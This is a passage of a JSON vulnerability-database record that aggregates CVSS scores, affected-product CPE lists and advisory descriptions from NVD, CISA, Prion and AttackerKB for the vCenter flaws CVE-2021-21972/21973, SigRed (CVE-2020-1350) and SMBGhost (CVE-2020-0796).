"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2020-0796", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T00:35:55", "description": "The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-24T17:15:00", "type": "prion", "title": "Server side request forgery (ssrf)", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2021-08-24T10:59:00", "id": "PRION:CVE-2021-21973", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-21973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T00:35:56", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-21972", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:18:14", "description": "A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2020-1350", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-1350", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:11:39", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-04-22T19:02:00", "id": "PRION:CVE-2020-0796", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-02T14:29:22", "description": "The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21973", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2021-08-24T10:59:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0", "cpe:/a:vmware:vcenter_server:6.5"], "id": "CVE-2021-21973", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:29:21", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21972", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2023-08-08T14:21:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0", "cpe:/a:vmware:vcenter_server:6.5"], "id": "CVE-2021-21972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T15:19:30", "description": "A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T23:15:00", "type": "cve", "title": "CVE-2020-1350", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:r2"], "id": "CVE-2020-1350", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1350", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:56:19", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "cve", "title": "CVE-2020-0796", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-04-22T19:02:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2020-0796", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-10-18T16:38:54", "description": "The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "CVE-2021-21973", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2023-10-07T00:00:00", "id": "AKB:11E283FA-0ADF-470B-87F5-A1FF90AC7873", "href": "https://attackerkb.com/topics/okLXhyCMGK/cve-2021-21973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-10-18T16:42:57", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:43:03", "description": "A remote code execution vulnerability codenamed \u201cSigRed\u201d exists in Windows Domain Name System servers when they fail to properly handle requests. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk from this vulnerability.\n\nTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server.\n\nThe update addresses the vulnerability by modifying how Windows DNS servers 